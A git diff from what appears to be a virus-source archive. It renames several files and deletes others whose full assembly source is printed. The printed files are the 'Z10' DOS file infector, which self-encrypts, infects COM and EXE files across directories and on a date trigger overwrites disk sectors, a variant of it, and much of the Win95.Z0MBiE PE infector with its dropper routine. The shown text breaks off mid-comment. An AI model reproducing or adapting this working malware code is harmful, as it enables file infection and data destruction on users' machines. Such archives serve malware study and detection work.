diff --git a/MSDOS/Z-Index/Virus.MSDOS.Unknown.z10-c.asm b/MSDOS/Virus.MSDOS.Abraxas.asm similarity index 100% rename from MSDOS/Z-Index/Virus.MSDOS.Unknown.z10-c.asm rename to MSDOS/Virus.MSDOS.Abraxas.asm diff --git a/MSDOS/Z-Index/Virus.MSDOS.Unknown.z10-d.asm b/MSDOS/Virus.MSDOS.GifKill.asm similarity index 100% rename from MSDOS/Z-Index/Virus.MSDOS.Unknown.z10-d.asm rename to MSDOS/Virus.MSDOS.GifKill.asm diff --git a/MSDOS/Z-Index/Virus.MSDOS.Unknown.zeno1.asm b/MSDOS/Virus.MSDOS.Spawner.asm similarity index 100% rename from MSDOS/Z-Index/Virus.MSDOS.Unknown.zeno1.asm rename to MSDOS/Virus.MSDOS.Spawner.asm diff --git a/MSDOS/Virus.MSDOS.Zed10.7z b/MSDOS/Virus.MSDOS.Zed10.7z new file mode 100644 index 00000000..084c5821 Binary files /dev/null and b/MSDOS/Virus.MSDOS.Zed10.7z differ diff --git a/MSDOS/Z-Index/Virus.MSDOS.Unknown.zep.asm b/MSDOS/Virus.MSDOS.Zep.asm similarity index 100% rename from MSDOS/Z-Index/Virus.MSDOS.Unknown.zep.asm rename to MSDOS/Virus.MSDOS.Zep.asm diff --git a/MSDOS/Z-Index/Virus.MSDOS.Unknown.zeppelin.asm b/MSDOS/Virus.MSDOS.Zeppelin.asm similarity index 100% rename from MSDOS/Z-Index/Virus.MSDOS.Unknown.zeppelin.asm rename to MSDOS/Virus.MSDOS.Zeppelin.asm diff --git a/MSDOS/Z-Index/Virus.MSDOS.Unknown.zerohunt.asm b/MSDOS/Virus.MSDOS.ZeroHunt.asm similarity index 100% rename from MSDOS/Z-Index/Virus.MSDOS.Unknown.zerohunt.asm rename to MSDOS/Virus.MSDOS.ZeroHunt.asm diff --git a/MSDOS/Z-Index/Virus.MSDOS.Unknown.zigzag.asm b/MSDOS/Virus.MSDOS.ZigZag.asm similarity index 100% rename from MSDOS/Z-Index/Virus.MSDOS.Unknown.zigzag.asm rename to MSDOS/Virus.MSDOS.ZigZag.asm diff --git a/MSDOS/Z-Index/Virus.MSDOS.Unknown.zombie.asm b/MSDOS/Virus.MSDOS.Zombie.747Bytes.asm similarity index 100% rename from MSDOS/Z-Index/Virus.MSDOS.Unknown.zombie.asm rename to MSDOS/Virus.MSDOS.Zombie.747Bytes.asm diff --git a/MSDOS/Z-Index/Virus.MSDOS.Unknown.zorm.asm b/MSDOS/Virus.MSDOS.Zorm.asm similarity index 100% rename from MSDOS/Z-Index/Virus.MSDOS.Unknown.zorm.asm rename to MSDOS/Virus.MSDOS.Zorm.asm diff --git a/MSDOS/Z-Index/Virus.MSDOS.Unknown.z10.asm b/MSDOS/Z-Index/Virus.MSDOS.Unknown.z10.asm deleted file mode 100644 index 2c0d437f..00000000 --- a/MSDOS/Z-Index/Virus.MSDOS.Unknown.z10.asm +++ /dev/null @@ -1,375 +0,0 @@ -; Z10.asm : [Z10] by Paul Ferguson -; Created wik the Phalcon/Skism Mass-Produced Code Generator -; from the configuration file skeleton.cfg - -.model tiny ; Handy directive -.code ; Virus code segment - org 100h ; COM file starting IP - -id = 'ZA' ; ID word for EXE infections -entry_point: db 0e9h,0,0 ; jmp decrypt - -decrypt: ; handles encryption and decryption -patch_startencrypt: - mov si,offset startencrypt ; start of decryption - mov di,(offset heap - offset startencrypt)/2 ; iterations -decrypt_loop: - db 2eh,81h,04h ; add word ptr cs:[si], xxxx -decrypt_value dw 0 ; initialised at zero for null effect - inc si ; calculate new decryption location - inc si - dec di ; If we are not done, then - jnz decrypt_loop ; decrypt mo' -startencrypt: - call next ; calculate delta offset -next: pop bp ; bp = IP next - sub bp,offset next ; bp = delta offset - - cmp sp,id ; COM or EXE? - je restoreEXE -restoreCOM: - lea si,[bp+save3] - mov di,100h - push di ; For later return - movsb - jmp short restoreEXIT -restoreEXE: - push ds - push es - push cs ; DS = CS - pop ds - push cs ; ES = CS - pop es - lea si,[bp+jmpsave2] - lea di,[bp+jmpsave] - movsw - movsw - movsw -restoreEXIT: - movsw - - mov byte ptr [bp+numinfec],2 ; reset infection counter - - mov ah,1Ah ; Set new DTA - lea dx,[bp+newDTA] ; new DTA @ DS:DX - int 21h - - mov ah,47h ; Get current directory - mov dl,0 ; Current drive - lea si,[bp+origdir] ; DS:SI->buffer - int 21h - mov byte ptr [bp+backslash],'\' ; Prepare for later CHDIR - - mov ax,3524h ; Get int 24 handler - int 21h ; to ES:BX - mov word ptr [bp+oldint24],bx; Save it - mov word ptr [bp+oldint24+2],es - mov ah,25h ; Set new int 24 handler - lea dx,[bp+offset int24] ; DS:DX->new handler - int 21h - push cs ; Restore ES - pop es ; 'cuz it was changed - -dir_scan: ; "dot dot" traversal - lea dx,[bp+exe_mask] - call infect_mask - lea dx,[bp+com_mask] - call infect_mask - mov ah,3bh ; change directory - lea dx,[bp+dot_dot] ; "cd .." - int 21h - jnc dir_scan ; go back for mo! - -done_infections: - mov ah,2ah ; Get current date - int 21h - cmp dh,10 ; Check month - jb exit_virus - cmp dl,30 ; Check date - jb exit_virus - cmp cx,1991 ; Check year - jb exit_virus - cmp al,0 ; Check date of week - jb exit_virus - - mov ah,2ch ; Get current time - int 21h - cmp dl,50 ; Check the percentage - jbe activate - -exit_virus: - mov ax,2524h ; Restore int 24 handler - lds dx,[bp+offset oldint24] ; to original - int 21h - push cs - pop ds - - mov ah,3bh ; change directory - lea dx,[bp+origdir-1] ; original directory - int 21h - - mov ah,1ah ; restore DTA to default - mov dx,80h ; DTA in PSP - cmp sp,id-4 ; EXE or COM? - jz returnEXE -returnCOM: - int 21h - retn ; 100h is on stack -returnEXE: - pop es - pop ds - int 21h - mov ax,es ; AX = PSP segment - add ax,10h ; Adjust for PSP - add word ptr cs:[bp+jmpsave+2],ax - add ax,word ptr cs:[bp+stacksave+2] - cli ; Clear intrpts for stack manipulation - mov sp,word ptr cs:[bp+stacksave] - mov ss,ax - sti - db 0eah ; jmp ssss:oooo -jmpsave dd ? ; Original CS:IP -stacksave dd ? ; Original SS:SP -jmpsave2 db ? ; Actually four bytes -save3 db 0cdh,20h,0 ; First 3 bytes of COM file -stacksave2 dd ? - -activate: ; Conditions satisfied - mov al,0002h ; First argument is 2 - mov cx,0080h ; Second argument is 16 - cli ; Disable interrupts (no Ctrl-C) - cwd ; Clear DX (start with sector 0) - int 026h ; Remove the semi-colon - sti ; Restore interrupts - mov ax,04C00h ; DOS terminate function - int 021h - jmp exit_virus - -creator db '[PF]',0 ; Mass Produced Code Generator -virusname db '[Z10]',0 -author db 'Paul Ferguson',0 - -infect_mask: - mov ah,4eh ; find first file - mov cx,7 ; any attribute -findfirstnext: - int 21h ; DS:DX points to mask - jc exit_infect_mask ; No mo files found - - mov al,0h ; Open read only - call open - - mov ah,3fh ; Read file to buffer - lea dx,[bp+buffer] ; @ DS:DX - mov cx,1Ah ; 1Ah bytes - int 21h - - mov ah,3eh ; Close file - int 21h - - cmp word ptr [bp+buffer],'ZM'; EXE? - jz checkEXE ; Why yes, yes it is! -checkCOM: - mov ax,word ptr [bp+newDTA+35] ; Get tail of filename - cmp ax,'DN' ; Ends in ND? (commaND) - jz find_next - - mov ax,word ptr [bp+newDTA+1Ah] ; Filesize in DTA - cmp ax,13000 ; Is it too small? - jb find_next - - cmp ax,65535-(endheap-decrypt) ; Is it too large? - ja find_next - - mov bx,word ptr [bp+buffer+1]; get jmp location - add bx,heap-decrypt+3 ; Adjust for virus size - cmp ax,bx - je find_next ; already infected - jmp infect_com -checkEXE: cmp word ptr [bp+buffer+10h],id ; is it already infected? - jnz infect_exe -find_next: - mov ah,4fh ; find next file - jmp short findfirstnext -exit_infect_mask: ret - -infect_exe: - les ax, dword ptr [bp+buffer+14h] ; Save old entry point - mov word ptr [bp+jmpsave2], ax - mov word ptr [bp+jmpsave2+2], es - - les ax, dword ptr [bp+buffer+0Eh] ; Save old stack - mov word ptr [bp+stacksave2], es - mov word ptr [bp+stacksave2+2], ax - - mov ax, word ptr [bp+buffer + 8] ; Get header size - mov cl, 4 ; convert to bytes - shl ax, cl - xchg ax, bx - - les ax, [bp+offset newDTA+26]; Get file size - mov dx, es ; to DX:AX - push ax - push dx - - sub ax, bx ; Subtract header size from - sbb dx, 0 ; file size - - mov cx, 10h ; Convert to segment:offset - div cx ; form - - mov word ptr [bp+buffer+14h], dx ; New entry point - mov word ptr [bp+buffer+16h], ax - - mov word ptr [bp+buffer+0Eh], ax ; and stack - mov word ptr [bp+buffer+10h], id - - pop dx ; get file length - pop ax - - add ax, heap-decrypt ; add virus size - adc dx, 0 - - mov cl, 9 - push ax - shr ax, cl - ror dx, cl - stc - adc dx, ax - pop ax - and ah, 1 ; mod 512 - - mov word ptr [bp+buffer+4], dx ; new file size - mov word ptr [bp+buffer+2], ax - - push cs ; restore ES - pop es - - push word ptr [bp+buffer+14h] ; needed later - mov cx, 1ah - jmp short finishinfection -infect_com: ; ax = filesize - mov cx,3 - sub ax,cx - lea si,[bp+offset buffer] - lea di,[bp+offset save3] - movsw - movsb - mov byte ptr [si-3],0e9h - mov word ptr [si-2],ax - add ax,103h - push ax ; needed later -finishinfection: - push cx ; Save # bytes to write - xor cx,cx ; Clear attributes - call attributes ; Set file attributes - - mov al,2 - call open - - mov ah,40h ; Write to file - lea dx,[bp+buffer] ; Write from buffer - pop cx ; cx bytes - int 21h - - mov ax,4202h ; Move file pointer - xor cx,cx ; to end of file - cwd ; xor dx,dx - int 21h - - mov ah,2ch ; Get current time - int 21h ; dh=sec,dl=1/100 sec - mov [bp+decrypt_value],dx ; Set new encryption value - lea di,[bp+code_store] - mov ax,5355h ; push bp,push bx - stosw - lea si,[bp+decrypt] ; Copy encryption function - mov cx,startencrypt-decrypt ; Bytes to move - push si ; Save for later use - push cx - rep movsb - - xor byte ptr [bp+decrypt_loop+2],028h ; flip between add/sub - - lea si,[bp+write] ; Copy writing function - mov cx,endwrite-write ; Bytes to move - rep movsb - pop cx - pop si - pop dx ; Entry point of virus - push di - push si - push cx - rep movsb ; Copy decryption function - mov ax,5b5dh ; pop bx,pop bp - stosw - mov al,0c3h ; retn - stosb - - add dx,offset startencrypt - offset decrypt ; Calculate new - mov word ptr [bp+patch_startencrypt+1],dx ; starting offset of - call code_store ; decryption - pop cx - pop di - pop si - rep movsb ; Restore decryption function - - mov ax,5701h ; Restore creation date/time - mov cx,word ptr [bp+newDTA+16h] ; time - mov dx,word ptr [bp+newDTA+18h] ; date - int 21h - - mov ah,3eh ; Close file - int 21h - - mov ch,0 - mov cl,byte ptr [bp+newDTA+15h] ; Restore original - call attributes ; attributes - - dec byte ptr [bp+numinfec] ; One mo infection - jnz mo_infections ; Not enough - pop ax ; remove call from stack - jmp done_infections -mo_infections: jmp find_next - -open: - mov ah,3dh - lea dx,[bp+newDTA+30] ; filename in DTA - int 21h - xchg ax,bx - ret - -attributes: - mov ax,4301h ; Set attributes to cx - lea dx,[bp+newDTA+30] ; filename in DTA - int 21h - ret - -write: - pop bx ; Restore file handle - pop bp ; Restore relativeness - mov ah,40h ; Write to file - lea dx,[bp+decrypt] ; Concatenate virus - mov cx,heap-decrypt ; # bytes to write - int 21h - push bx - push bp -endwrite: - -int24: ; New int 24h (error) handler - mov al,3 ; Fail call - iret ; Return control - -exe_mask db '*.exe',0 -com_mask db '*.com',0 -dot_dot db '..',0 -heap: ; Variables not in code -code_store: db (startencrypt-decrypt)*2+(endwrite-write)+1 dup (?) -oldint24 dd ? ; Storage for old int 24h handler -backslash db ? -origdir db 64 dup (?) ; Current directory buffer -newDTA db 43 dup (?) ; Temporary DTA -numinfec db ? ; Infections this run -buffer db 1ah dup (?) ; read buffer -endheap: ; End of virus -end entry_point diff --git a/MSDOS/Z-Index/Virus.MSDOS.Unknown.z10_b.asm b/MSDOS/Z-Index/Virus.MSDOS.Unknown.z10_b.asm deleted file mode 100644 index 3e17fffc..00000000 --- a/MSDOS/Z-Index/Virus.MSDOS.Unknown.z10_b.asm +++ /dev/null @@ -1,353 +0,0 @@ -; Z10.asm : [Z10] by Paul Ferguson -; Created wik the Phalcon/Skism Mass-Produced Code Generator -; from the configuration file skeleton.cfg - -.model tiny ; Handy directive -.code ; Virus code segment - org 100h ; COM file starting IP - -id = 'ZA' ; ID word for EXE infections -entry_point: db 0e9h,0,0 ; jmp decrypt - -decrypt: loop decrypt ; handles encryption and decryption -patch_startencrypt: - mov si,offset startencrypt ; start of decryption - mov di,(offset heap - offset startencrypt)/2 ; iterations -decrypt_loop: - db 2eh,81h,04h ; add word ptr cs:[si], xxxx -decrypt_value dw 0 ; initialised at zero for null effect - inc si ; calculate new decryption location - inc si - dec di ; If we are not done, then - jnz decrypt_loop ; decrypt mo' -startencrypt: - call next ; calculate delta offset -next: pop bp ; bp = IP next - sub bp,offset next ; bp = delta offset - - cmp sp,id ; COM or EXE? - je restoreEXE -restoreCOM: - lea si,[bp+save3] - mov di,100h - push di ; For later return - movsb - jmp short restoreEXIT -restoreEXE: - push ds - push es - push cs ; DS = CS - pop ds - push cs ; ES = CS - pop es - lea si,[bp+jmpsave2] - lea di,[bp+jmpsave] - movsw - movsw - movsw -restoreEXIT: - movsw - - mov byte ptr [bp+numinfec],2 ; reset infection counter - - mov ah,1Ah ; Set new DTA - lea dx,[bp+newDTA] ; new DTA @ DS:DX - int 21h - - mov ah,47h ; Get current directory - mov dl,0 ; Current drive - lea si,[bp+origdir] ; DS:SI->buffer - int 21h - mov byte ptr [bp+backslash],'\' ; Prepare for later CHDIR - - mov ax,3524h ; Get int 24 handler - int 21h ; to ES:BX - mov word ptr [bp+oldint24],bx; Save it - mov word ptr [bp+oldint24+2],es - mov ah,25h ; Set new int 24 handler - lea dx,[bp+offset int24] ; DS:DX->new handler - int 21h - push cs ; Restore ES - pop es ; 'cuz it was changed - -dir_scan: ; "dot dot" traversal - lea dx,[bp+exe_mask] - call infect_mask - lea dx,[bp+com_mask] - call infect_mask - mov ah,3bh ; change directory - lea dx,[bp+dot_dot] ; "cd .." - int 21h - jnc dir_scan ; go back for mo! - -done_infections: - mov ah,2ch ; Get current time - int 21h - cmp dl,90 ; Check the percentage - jbe activate - -exit_virus: - mov ax,2524h ; Restore int 24 handler - lds dx,[bp+offset oldint24] ; to original - int 21h - push cs - pop ds - - mov ah,3bh ; change directory - lea dx,[bp+origdir-1] ; original directory - int 21h - - mov ah,1ah ; restore DTA to default - mov dx,80h ; DTA in PSP - cmp sp,id-4 ; EXE or COM? - jz returnEXE -returnCOM: - int 21h - retn ; 100h is on stack -returnEXE: - pop es - pop ds - int 21h - mov ax,es ; AX = PSP segment - add ax,10h ; Adjust for PSP - add word ptr cs:[bp+jmpsave+2],ax - add ax,word ptr cs:[bp+stacksave+2] - cli ; Clear intrpts for stack manipulation - mov sp,word ptr cs:[bp+stacksave] - mov ss,ax - sti - db 0eah ; jmp ssss:oooo -jmpsave dd ? ; Original CS:IP -stacksave dd ? ; Original SS:SP -jmpsave2 db ? ; Actually four bytes -save3 db 0cdh,20h,0 ; First 3 bytes of COM file -stacksave2 dd ? - -activate: ; Conditions satisfied - - jmp exit_virus - -infect_mask: - mov ah,4eh ; find first file - mov cx,7 ; any attribute -findfirstnext: - int 21h ; DS:DX points to mask - jc exit_infect_mask ; No mo files found - - mov al,0h ; Open read only - call open - - mov ah,3fh ; Read file to buffer - lea dx,[bp+buffer] ; @ DS:DX - mov cx,1Ah ; 1Ah bytes - int 21h - - mov ah,3eh ; Close file - int 21h - - cmp word ptr [bp+buffer],'ZM'; EXE? - jz checkEXE ; Why yes, yes it is! -checkCOM: - mov ax,word ptr [bp+newDTA+35] ; Get tail of filename - cmp ax,'DN' ; Ends in ND? (commaND) - jz find_next - - mov ax,word ptr [bp+newDTA+1Ah] ; Filesize in DTA - cmp ax,13000 ; Is it too small? - jb find_next - - cmp ax,65535-(endheap-decrypt) ; Is it too large? - ja find_next - - mov bx,word ptr [bp+buffer+1]; get jmp location - add bx,heap-decrypt+3 ; Adjust for virus size - cmp ax,bx - je find_next ; already infected - jmp infect_com -checkEXE: cmp word ptr [bp+buffer+10h],id ; is it already infected? - jnz infect_exe -find_next: - mov ah,4fh ; find next file - jmp short findfirstnext -exit_infect_mask: ret - -infect_exe: - les ax, dword ptr [bp+buffer+14h] ; Save old entry point - mov word ptr [bp+jmpsave2], ax - mov word ptr [bp+jmpsave2+2], es - - les ax, dword ptr [bp+buffer+0Eh] ; Save old stack - mov word ptr [bp+stacksave2], es - mov word ptr [bp+stacksave2+2], ax - - mov ax, word ptr [bp+buffer + 8] ; Get header size - mov cl, 4 ; convert to bytes - shl ax, cl - xchg ax, bx - - les ax, [bp+offset newDTA+26]; Get file size - mov dx, es ; to DX:AX - push ax - push dx - - sub ax, bx ; Subtract header size from - sbb dx, 0 ; file size - - mov cx, 10h ; Convert to segment:offset - div cx ; form - - mov word ptr [bp+buffer+14h], dx ; New entry point - mov word ptr [bp+buffer+16h], ax - - mov word ptr [bp+buffer+0Eh], ax ; and stack - mov word ptr [bp+buffer+10h], id - - pop dx ; get file length - pop ax - - add ax, heap-decrypt ; add virus size - adc dx, 0 - - mov cl, 9 - push ax - shr ax, cl - ror dx, cl - stc - adc dx, ax - pop ax - and ah, 1 ; mod 512 - - mov word ptr [bp+buffer+4], dx ; new file size - mov word ptr [bp+buffer+2], ax - - push cs ; restore ES - pop es - - push word ptr [bp+buffer+14h] ; needed later - mov cx, 1ah - jmp short finishinfection -infect_com: ; ax = filesize - mov cx,3 - sub ax,cx - lea si,[bp+offset buffer] - lea di,[bp+offset save3] - movsw - movsb - mov byte ptr [si-3],0e9h - mov word ptr [si-2],ax - add ax,103h - push ax ; needed later -finishinfection: - push cx ; Save # bytes to write - xor cx,cx ; Clear attributes - call attributes ; Set file attributes - - mov al,2 - call open - - mov ah,40h ; Write to file - lea dx,[bp+buffer] ; Write from buffer - pop cx ; cx bytes - int 21h - - mov ax,4202h ; Move file pointer - xor cx,cx ; to end of file - cwd ; xor dx,dx - int 21h - - mov ah,2ch ; Get current time - int 21h ; dh=sec,dl=1/100 sec - mov [bp+decrypt_value],dx ; Set new encryption value - lea di,[bp+code_store] - mov ax,5355h ; push bp,push bx - stosw - lea si,[bp+decrypt] ; Copy encryption function - mov cx,startencrypt-decrypt ; Bytes to move - push si ; Save for later use - push cx - rep movsb - - xor byte ptr [bp+decrypt_loop+2],028h ; flip between add/sub - - lea si,[bp+write] ; Copy writing function - mov cx,endwrite-write ; Bytes to move - rep movsb - pop cx - pop si - pop dx ; Entry point of virus - push di - push si - push cx - rep movsb ; Copy decryption function - mov ax,5b5dh ; pop bx,pop bp - stosw - mov al,0c3h ; retn - stosb - - add dx,offset startencrypt - offset decrypt ; Calculate new - mov word ptr [bp+patch_startencrypt+1],dx ; starting offset of - call code_store ; decryption - pop cx - pop di - pop si - rep movsb ; Restore decryption function - - mov ax,5701h ; Restore creation date/time - mov cx,word ptr [bp+newDTA+16h] ; time - mov dx,word ptr [bp+newDTA+18h] ; date - int 21h - - mov ah,3eh ; Close file - int 21h - - mov ch,0 - mov cl,byte ptr [bp+newDTA+15h] ; Restore original - call attributes ; attributes - - dec byte ptr [bp+numinfec] ; One mo infection - jnz mo_infections ; Not enough - pop ax ; remove call from stack - jmp done_infections -mo_infections: jmp find_next - -open: - mov ah,3dh - lea dx,[bp+newDTA+30] ; filename in DTA - int 21h - xchg ax,bx - ret - -attributes: - mov ax,4301h ; Set attributes to cx - lea dx,[bp+newDTA+30] ; filename in DTA - int 21h - ret - -write: - pop bx ; Restore file handle - pop bp ; Restore relativeness - mov ah,40h ; Write to file - lea dx,[bp+decrypt] ; Concatenate virus - mov cx,heap-decrypt ; # bytes to write - int 21h - push bx - push bp -endwrite: - -int24: ; New int 24h (error) handler - mov al,3 ; Fail call - iret ; Return control - -exe_mask db '*.exe',0 -com_mask db '*.com',0 -dot_dot db '..',0 -heap: ; Variables not in code -code_store: db (startencrypt-decrypt)*2+(endwrite-write)+1 dup (?) -oldint24 dd ? ; Storage for old int 24h handler -backslash db ? -origdir db 64 dup (?) ; Current directory buffer -newDTA db 43 dup (?) ; Temporary DTA -numinfec db ? ; Infections this run -buffer db 1ah dup (?) ; read buffer -endheap: ; End of virus -end entry_point diff --git a/MSDOS/Z-Index/Virus.MSDOS.Unknown.zombie95.asm b/MSDOS/Z-Index/Virus.MSDOS.Unknown.zombie95.asm deleted file mode 100644 index 798b9fc3..00000000 --- a/MSDOS/Z-Index/Virus.MSDOS.Unknown.zombie95.asm +++ /dev/null @@ -1,974 +0,0 @@ -; -; ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ -; ³ Win95.Z0MBiE ³ -; ³ v1.01, by Z0MBiE ³ -; ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ -; -; This is the first collaboration of the russian virus writer Z0MBiE to 29A, -; and also his first Win95 PE infector. It is an encrypted runtime PE infec- -; tor which, after having decrypted its body, locates KERNEL32.DLL and then -; looks in its export table for the address of the API functions used it the -; viral code. This virus has also the feature which consists on looking for -; files to infect in the Windows directory as well as in other units. PE in- -; fection consists on adding a new section (called .Z0MBiE) to infected exe- -; cutables and creating an entry point in it for the virus code. Last but -; not least, Win95.Z0MBiE, after having infected files in a given drive, in- -; serts a dropper called ZSetUp.EXE in the root directory. This file is ac- -; tually a dropper of the Z0MBiE.1922 virus, also included in this issue of -; 29A, in the "Viruses" section of the magazine. Its peculiarities are des- -; cribed there, together with the analysis of Igor Daniloff, same as the one -; which follows, describing the behavior of Win95.ZOMBiE. -; -; -; - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - >8 -; Win95.Zombie -; -; Igor Daniloff -; DialogueScience -; -; Win95.Zombie is a nondestructive nonresident encrypted virus which -; infects PortableExecutable EXE files. On starting an infected file, -; the virus decryptor explodes the main virus body and passes control -; to it. The main virus body determines the location of KERNEL32 Export -; Table in memory and saves in its code the address of WIN32 KERNEL API -; functions that are essential for infecting files. -; -; Then the virus determines the command line of the currently-loaded -; infected program and loads it once again through the WinExec function. -; The second virus copy then infects the system. The first virus copy -; (that started a second copy the infected program), after completing -; the WinExec procedure, returns control to the host program. -; -; To infect PE EXE files, the virus scans the Windows system folder and -; also takes peeps into all other folders in drives C:, D:, E:, and F:. -; On detecting a PE EXE file, the virus analyzes the file. If all is well, -; the file is infected. Win95.Zombie creates a new segment section .Z0MBiE -; in the PE header, sets an entry point to it, and appends a copy of the -; encrypted code at the file end which is within the limits of the region -; of this segment section. After infecting the logical drive, the virus -; creates a dropper file ZSetUp.EXE in the root directory and assigns it -; ARCHIVE and SYSTEM attributes. In this file, Win95.Zombie plants a -; Zombie.1922 virus code. The virus contains a few text strings: -; -; Z0MBiE 1.01 (c) 1997 -; My 2nd virii for mustdie -; Tnx to S.S.R. -; -; Z0MBiE`1668 v1.00 (c) 1997 Z0MBiE -; Tnx to S.S.R. -; ShadowRAM/Virtual Process Infector -; ShadowRAM Technology (c) 1996,97 Z0MBiE -; -; code................1398 -; viriisize...........4584 -; virtsize............8936 -; -; - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - >8 -; -; -; Compiling it -; ÄÄÄÄÄÄÄÄÄÄÄÄ -; tasm32 -ml -m5 -q -zn zombie.asm -; tlink32 -Tpe -c -x -aa zombie.obj,,, import32.lib -; pewrsec zombie.exe -; -; - -[ZOMBIE.ASM] - - - - - - - - - - - - - - - - - - - - - - - - - - - - >8 - - .386 - locals - jumps - .model flat - -extrn ExitProcess:PROC -extrn MessageBoxA:PROC - -kernel equ 0BFF70000H - -FILE_ID equ 'Z0' -PORT_ID equ 'Z' - - .data - -sux db 'mustdie' - - .code -start: - call codestart - - lea ebp, [eax - 401000H] - lea edx, codestart[ebp] -cryptn equ (viriisize-decrsize+3) / 4 - mov ecx, cryptn -@@1: neg dword ptr [edx] - xor dword ptr [edx], 12345678h -xorword equ dword ptr $-4 - sub edx, -4 - loop @@1 - jmp codestart - - align 4 -decrsize equ $-start - -codestart: lea ebp, [eax - 401000H] - sub eax, 12345678h -subme equ dword ptr $-4 - push eax - - call analizekernel - - call first - - in al, 81h - cmp al, PORT_ID - je exit_to_program - - in al, 80h - cmp al, PORT_ID - je infect - - mov al, PORT_ID - out 80h, al - - call ExecExe - -exit_to_program: ret - -infect: mov al, -1 - out 80h, al - - ; call _GetModuleHandleA - ; push 9 - ; push eax - ; call _SetPriorityClass - - ; infect windows directory - - lea edx, infdir[ebp] - call getwindir - lea edx, infdir[ebp] - call setdir - call infectdir - - ; recursive infect - - lea edx, drive_c[ebp] - call recinfect1st - call createsetup - - lea edx, drive_d[ebp] - call recinfect1st - call createsetup - - lea edx, drive_e[ebp] - call recinfect1st - call createsetup - - lea edx, drive_f[ebp] - call recinfect1st - call createsetup - - mov al, PORT_ID - out 81h, al - -exit_to_mustdie: push -1 - call _ExitProcess - -; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ subprograms ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ - -createsetup: lea edx, zsetup[ebp] - call createfile - - lea edx, z[ebp] - mov ecx, z_size - call writefile - - call closefile - - ret - -first: pop edi - mov byte ptr [edi-5], 0b9h ; mov ecx, xxxxxxxx - mov byte ptr start[ebp], 0b9h - - call infectfile - jmp exit_to_mustdie - -ExecExe: call _GetCommandLineA -SW_NORMAL equ 1 - push SW_NORMAL - push eax - call _WinExec - ret - -recinfect1st: call setdir - -recinfect: call infectdir - - lea eax, win32_data_thang[ebp] - push eax - lea eax, dirfiles[ebp] - push eax - call _FindFirstFileA - mov edi, eax - inc eax - jz @@nomorefiles - -@@processfile: lea eax, fileattr[ebp] - mov al, [eax] - cmp al, 10h ; directory ? - jne @@findnext - - lea edx, fullname[ebp] - cmp byte ptr [edx], '.' - je @@findnext - call setdir - - push edi - lea edx, fullname[ebp] - call recinfect - pop edi - - lea edx, prev_dir[ebp] - call setdir - -@@findnext: lea eax, win32_data_thang[ebp] - push eax - push edi - call _FindNextFileA - - or eax, eax - jnz @@processfile - -@@nomorefiles: ret - -nokerneldll: -nofunction: -exit: jmp $ - -analizekernel: mov esi, kernel -@@1: ; cmp esi, kernel + 040000h - ; ja nokernelfunc - lea edi, kernel_sign[ebp] - mov ecx, kernel_sign_size - rep cmpsb - jne @@1 - -kernelfound: sub esi, kernel_sign_size - mov kernel_call[ebp], esi - - mov esi, kernel - lodsw - cmp ax, 'ZM' - jne nokerneldll - - add esi, 003Ch-2 - lodsd - - lea esi, [esi + eax - 3ch - 4] - lodsd - cmp eax, 'EP' - jne nokerneldll - - add esi, 78h-4 ; esi=.edata - - lodsd - add eax, kernel + 10h - xchg esi, eax - - lodsd - lodsd - lodsd - mov funcnum[ebp], eax - - lodsd - add eax, kernel - mov entrypointptr[ebp], eax - - lodsd - add eax, kernel - mov nameptr[ebp], eax - - lodsd - add eax, kernel - mov ordinalptr[ebp], eax - - lea edx, names[ebp] - lea edi, fns[ebp] - -@@1: push edi - call findfunction - pop edi - - inc edi ; 68 - stosd - add edi, 6 ; jmp kernel_call[ebp] - - mov edx, esi - - cmp byte ptr [esi], 0 - jne @@1 - - ret - -findfunction: mov ecx, 12345678h -funcnum equ dword ptr $-4 - xor ebx, ebx - -findnextfunc: mov esi, edx - - mov edi, [ebx + 12345678h] -nameptr equ dword ptr $-4 - add edi, kernel - -@@2: cmpsb - jne @@1 - - cmp byte ptr [esi-1], 0 - jne @@2 - - ; found - - shr ebx, 1 - movzx eax, word ptr [ebx + 12345678h] -ordinalptr equ dword ptr $-4 - shl eax, 2 - mov eax, [eax + 12345678h] -entrypointptr equ dword ptr $-4 - add eax, kernel - - ret - -@@1: add ebx, 4 - loop findnextfunc - - jmp nofunction - - -infectdir: lea eax, win32_data_thang[ebp] - push eax - lea eax, exefiles[ebp] - push eax - call _FindFirstFileA - - mov searchhandle[ebp], eax - inc eax - jz @@exit - -@@next: call infectfile - - lea eax, win32_data_thang[ebp] - push eax - push 12345678h -searchhandle equ dword ptr $-4 - call _FindNextFileA - - or eax, eax - jnz @@next - -@@exit: ret - - ; input: ECX=file attr - ; EDX=file - ; output: EAX=handle - -openfile: push 0 - push ecx - push 3 ; OPEN_EXISTING - push 0 - push 0 - push 80000000h + 40000000h - push edx - call _CreateFileA - mov handle[ebp], eax - ret - - ; input: EDX=file - ; output: EAX=handle - -createfile: push 0 - push ecx - push 1 ; CREATE - push 0 - push 0 - push 80000000h + 40000000h - push edx - call _CreateFileA - mov handle[ebp], eax - ret - -seekfile: push 0 - push 0 - push edx - push handle[ebp] - call _SetFilePointer - ret - -closefile: push handle[ebp] - call _CloseHandle - ret - - ; input: ECX=bytes to read - ; EDX=buf - -readfile: push 0 - lea eax, bytesread[ebp] - push eax - push ecx - push edx - push handle[ebp] - call _ReadFile - ret - - ; input: ECX=bytes to read - ; EDX=buf - -writefile: push 0 - lea eax, bytesread[ebp] - push eax - push ecx - push edx - push handle[ebp] - call _WriteFile - ret - - ; input: EDX=offset directory (256 byte) - -getdir: cld - push edx - push 255 - call _GetCurrentDirectoryA - ret - - ; input: EDX=directory - -setdir: push edx - call _SetCurrentDirectoryA - ret - -getwindir: cld - push 255 - push edx - call _GetWindowsDirectoryA - ret - -infectfile: in al, 82h - cmp al, PORT_ID - jne @@continue - - lea eax, fullname[ebp] - cmp dword ptr [eax], 'BM0Z' - jne @@exit - -@@continue: mov ecx, fileattr[ebp] - lea edx, fullname[ebp] - call openfile - - inc eax - jz @@exit - -; goto the dword that stores the location of the pe header - - mov edx, 3Ch - call seekfile - -; read in the location of the 